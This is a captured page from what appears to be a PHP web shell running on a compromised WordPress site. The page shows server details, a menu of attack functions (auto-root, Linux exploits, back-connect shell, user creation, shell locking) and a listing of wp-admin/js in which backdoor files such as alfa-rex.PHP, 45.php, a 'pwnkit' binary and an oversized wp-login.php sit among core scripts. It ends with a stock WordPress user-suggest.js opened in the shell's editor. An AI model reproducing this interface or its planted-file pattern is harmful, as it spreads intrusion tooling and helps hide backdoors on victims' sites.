Linux webm008.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.110.20.8 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
5.4.45
einst
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
einst /
www /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
356
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
45.php
23.86
KB
-rw-r--r--
BDKR.txt
0
B
-rw-r--r--
BDKR28_qznnyf0x.php
0
B
-rw-r--r--
a67.php
3.61
KB
-rw-r--r--
about.php
1.04
MB
-rw-r--r--
admin-footer-20260722160555.ph...
2.76
KB
-rw-r--r--
admin-footer.php
2.76
KB
-rw-r--r--
alfa-rex.PHP
1.04
MB
-rw-r--r--
alfa-rex.PhP7
1.04
MB
-rw-r--r--
color-picker.js
9.59
KB
-rw-r--r--
customize-controls.js
283.99
KB
-rw-r--r--
customize-controls.min.js
108.15
KB
-rw-r--r--
customize-widgets.js
69.81
KB
-rw-r--r--
editor-expand.min.js
13.1
KB
-rw-r--r--
gallery-20260721231421.js
5.51
KB
-rw-r--r--
gallery.js
5.51
KB
-rw-r--r--
inline-edit-tax.min.js
2.8
KB
-rw-r--r--
link-parse-opml-20260722165706...
2.54
KB
-rw-r--r--
link-parse-opml.php
2.54
KB
-rw-r--r--
media-upload.min.js
1.09
KB
-rw-r--r--
nav-menu.js
42.66
KB
-rw-r--r--
options-reading.php
9.48
KB
-rw-r--r--
options.php
11.91
KB
-rw-r--r--
postbox.min.js
4.05
KB
-rw-r--r--
privacy.php
267
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
revisions-20260722083216.js
33
KB
-rw-r--r--
revisions.min.js
17.42
KB
-rw-r--r--
set-post-thumbnail-20260722145...
841
B
-rw-r--r--
set-post-thumbnail.js
841
B
-rw-r--r--
set-post-thumbnail.min.js
533
B
-rw-r--r--
sites.php
12.95
KB
-rw-r--r--
tags-box.js
10.78
KB
-rw-r--r--
tags-box.min.js
2.95
KB
-rw-r--r--
tags-suggest.js
5.31
KB
-rw-r--r--
tags-suggest.min.js
2.14
KB
-rw-r--r--
tags.min.js
1.74
KB
-rw-r--r--
theme-plugin-editor-2026072210...
24.1
KB
-rw-r--r--
theme-plugin-editor.js
24.1
KB
-rw-r--r--
ubyvxunc.php
0
B
-rw-r--r--
user-profile.min-2026072207401...
5.41
KB
-rw-r--r--
user-profile.min.js
5.41
KB
-rw-r--r--
user-suggest.js
2.26
KB
-rw-r--r--
wp-fullscreen-stub.min.js
326
B
-rw-r--r--
wp-login.php
1.04
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-suggest.js
/** * Suggests users in a multisite environment. * * For input fields where the admin can select a user based on email or * username, this script shows an autocompletion menu for these inputs. Should * only be used in a multisite environment. Only users in the currently active * site are shown. * * @since 3.4.0 * @output wp-admin/js/user-suggest.js */ /* global ajaxurl, current_site_id, isRtl */ (function( $ ) { var id = ( typeof current_site_id !== 'undefined' ) ? '&site_id=' + current_site_id : ''; $(document).ready( function() { var position = { offset: '0, -1' }; if ( typeof isRtl !== 'undefined' && isRtl ) { position.my = 'right top'; position.at = 'right bottom'; } /** * Adds an autocomplete function to input fields marked with the class * 'wp-suggest-user'. * * A minimum of two characters is required to trigger the suggestions. The * autocompletion menu is shown at the left bottom of the input field. On * RTL installations, it is shown at the right top. Adds the class 'open' to * the input field when the autocompletion menu is shown. * * Does a backend call to retrieve the users. * * Optional data-attributes: * - data-autocomplete-type (add, search) * The action that is going to be performed: search for existing users * or add a new one. Default: add * - data-autocomplete-field (user_login, user_email) * The field that is returned as the value for the suggestion. * Default: user_login * * @see wp-admin/includes/admin-actions.php:wp_ajax_autocomplete_user() */ $( '.wp-suggest-user' ).each( function(){ var $this = $( this ), autocompleteType = ( typeof $this.data( 'autocompleteType' ) !== 'undefined' ) ? $this.data( 'autocompleteType' ) : 'add', autocompleteField = ( typeof $this.data( 'autocompleteField' ) !== 'undefined' ) ? $this.data( 'autocompleteField' ) : 'user_login'; $this.autocomplete({ source: ajaxurl + '?action=autocomplete-user&autocomplete_type=' + autocompleteType + '&autocomplete_field=' + autocompleteField + id, delay: 500, minLength: 2, position: position, open: function() { $( this ).addClass( 'open' ); }, close: function() { $( this ).removeClass( 'open' ); } }); }); }); })( jQuery );
Close